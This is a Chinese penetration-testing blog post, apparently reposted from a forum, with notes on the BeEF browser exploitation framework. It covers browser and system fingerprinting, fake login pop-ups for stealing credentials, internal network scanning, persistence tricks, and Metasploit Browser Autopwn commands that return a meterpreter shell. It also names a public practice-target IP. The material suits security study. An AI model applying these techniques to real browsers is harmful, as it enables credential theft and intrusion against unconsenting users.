扫码领资料
获网安教程
免费&进群
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。经过测试以及在公网上的搭建,几个月前的笔记了,今天看见周末老师发了个帝国的文章,想起来我有很多笔记可以发,因此就先放一篇beef的笔记吧。
本次公网测试主要利用了xss靶场进行测试。
http://117.167.136.245:10181/Feedback.asp
beef只允许在linux和mac下安装,kali环境(<2019.2)自带,centos6.5安装过程看附件,没有mac环境。
(一).浏览器信息:
收集内容:
浏览器名称版本
浏览器用户版本
插件(包括Java,ActiveX,VBS,Flash……)
窗口大小
收集方法:
(1)默认收集信息:
(2)利用插件:
ps:这里面颜色的区别:
模块图标不同颜色对应不同的使用效果
绿色:适用当前浏览器
橙色:适用当前浏览器,但易被用户发现,社工模块默认为橙色
红色:不适于当前浏览器,但是可以尝试
灰色,根本就不能使用
(二).系统信息:
可收集:
安装的软件(适用于IE下,Detect Software模块)
注册表键值(适用于IE下,此时会弹出提示消息)
内网IP(Java模块得到授权)
系统详情(通过JavaApplet获取系统版本、Java VM details、NIC >names and IP、处理器、内存、屏幕显示模式)
定位(通过Google maps)
剪贴板信息(会弹出提示消息)
ps:不同的浏览器所能使用的模块不同,本人测试了六合浏览器(手机+pc),不一一列举,放两张对比下。
mac(自带):
pc(谷歌):
(三).用户行为:
可收集:
用户是否访问过某URL、domain
是否登录特定网站账号
是否使用TOR
如图:
如果使用BeEF控制了浏览器,那么就可以修改整个页面来尝试社会工程学
获取登录信息
如果当他正在挂着facebook,这时候你弹个facebook的登录框,如果他单纯的话,账户信息就过来了
具体流程:
攻击执行
客户点击:
密码盗取:
同样的还有其他模块也能造成在这种:
再有社工类的其他模块大概思路就是:
劫持(跳转到新的页面),诱导(诱导点击或者下载),重定向(钓鱼,下载重定向等)
直接放相关模块截图:
通过JavaScript,可以尝试利用浏览器扫描内网
1.获取内网ip
Get Internal IP WebRTC模块:
通过WebRTC获取内网IP
Get Internal IP模块:
通过Java Socket class获取内网IP
2.识别局域网
识别内网网关,如图
3.识别HTTP Servers
识别内网web servers
4.ping操作
调用ping命令扫描内网
Ping Sweep模块 Ping Sweep (Java)模块
如图
5.跨域扫描
6、DNS枚举
7.端口扫描
Port Scanner模块
8.网络指纹特征扫描
用来扫描内网中的Web服务器和网络设备
Fingerprint Network模块
如图
9、远程 CSRFs
10、IRC NAT Pinning
模拟浏览器的IRC通信,可用来绕过防火墙
10.网络拓扑
BeEF可根据扫描获得的信息绘制内网网络拓扑 如图
(一)Metasploit系列模块
(二)Browser Autopwn
反弹回meterpreter
方法:
1.使用Metasploit的Browser Autopwn功能生成BrowserAutoPwn URL
use auxiliary/server/browser_autopwn
show options
set LHOST 192.168.16.245
set SRVHOST 192.168.16.245
set SRVPORT 8881
run -z
生成链接:
2.使用”Create Invisible Iframe”模块加载autopwn页面
3.等待弹回shell
sessions -l
代理功能
方法:
1.选择控制的浏览器
2、浏览器代理设置
HTTP Proxy:127.0.0.1
Port:6789
1、Create Pop Under模块
创建一个新窗口,如图
被拦截了,我们看下效果吧
但是我们勾选上单机事件就能进行绕过:
按理论来说,应该会在增加一个在线浏览器,但是并没有增加
2、Confirm Close Tab模块
当用户关闭当前页面时,反复弹出确认是否关闭页面的消息
3、Create Foreground iFrame模块
修改当前页面所有链接来避免离开当前页面
比如用户点击某个连接,会将新页面显示在当前页面上面,注意的是网址不会发生改变,以自带的测试页面举例,如图:
4、Man In The Browser模块
可拦截修改页面内所有链接,当用户点击当前页面的任意链接后仍可维持权限(必须是同源的页面)
如果用户手动更改URL地址栏,无法维持权限
经测试可以在android上使用的模块:
1、弹框
2、重定向
3、查看是否访问过某些网站
4、Creates an invisible iframe
5、社工系列
6、msf系列
7、NetWork系列,可以用来扫描同一内网下的windows主机
在我用公网测试到这里的时候。。。不知道为啥我的链接不能用了,怎么都获取不到session了,就很迷,本来是打算继续测试下朋友圈的。。因此就这样吧,下一篇写个实战的,pyq钓个鱼(有剧本的合法的)
来源:https://bbs.zkaq.cn/t/4578.html
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
(hack视频资料及工具)
(部分展示)
往期推荐
【精选】SRC快速入门+上分小秘籍+实战指南
爬取免费代理,拥有自己的代理池
漏洞挖掘|密码找回中的套路
渗透测试岗位面试题(重点:渗透思路)
漏洞挖掘 | 通用型漏洞挖掘思路技巧
干货|列了几种均能过安全狗的方法!
一名大学生的黑客成长史到入狱的自述
攻防演练|红队手段之将蓝队逼到关站!
巧用FOFA挖到你的第一个漏洞